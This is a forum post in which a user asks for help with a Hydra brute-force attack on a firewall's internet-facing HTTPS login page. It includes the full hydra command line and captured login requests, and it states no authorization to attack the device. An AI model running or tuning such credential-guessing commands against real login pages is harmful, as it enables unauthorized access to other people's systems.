Forum Thread: Hydra Only False Positive and Stops After 16 Passwords Per User

hey guys,

just started a brute force on a firewalls login site which is often open to the wild web, but everything i get is false positives and it stops after 16 attempts.

I use:

hydra -L WordlistUser.txt -P WordlistPasswords.txt XXX.XXX.XXX.XXX https-post-form -s 1550 "/auth1.html:param1=&param2=62F1C69CDE41EE6DD2998CFAD2EB829B&id=ef&sessId=6E068445CFB7EE3B6B784B1F2771DC49&select2=English&uName=^USER^&pass=^PASS^:Incorrect name/password" -V

The post it sends via browser is:

POST /auth.cgi HTTP/1.1
Host: XXX.XXX.XXX.XXX:1550
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: XXX.XXX.XXX.XXX:1550/auth1.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Cookie: SessId=8C144778424DA68E956BC4C9EDDC38D0; PageSeed=2b1427a16a0df63b30d70c357465bbb9
Connection: close
Upgrade-Insecure-Requests: 1

param1=&param2=4FA14DDB2801C5817D896272CCBC07F4&id=51&sessId=8C144778424DA68E956BC4C9EDDC38D0&select2=English&uName=test&pass=test&digest=

the answer i get is

GET /auth1.html HTTP/1.1
Host: XXX.XXX.XXX.XXX:1550
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: XXX.XXX.XXX.XXX:1550/auth.html
Cookie: SessId=52F99AB1FFC088467F04C44883DAD4AD; PageSeed=e5b234790019f1d4e22e62df4c7d44c3
Connection: close
Upgrade-Insecure-Requests: 1

the site shows me "Incorrect name/password" after a wrong combination, thats why I end with ":Incorrect name/password"

any suggestions?

Get The Null Byte Newsletter

Never miss a new hacking or security guide

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active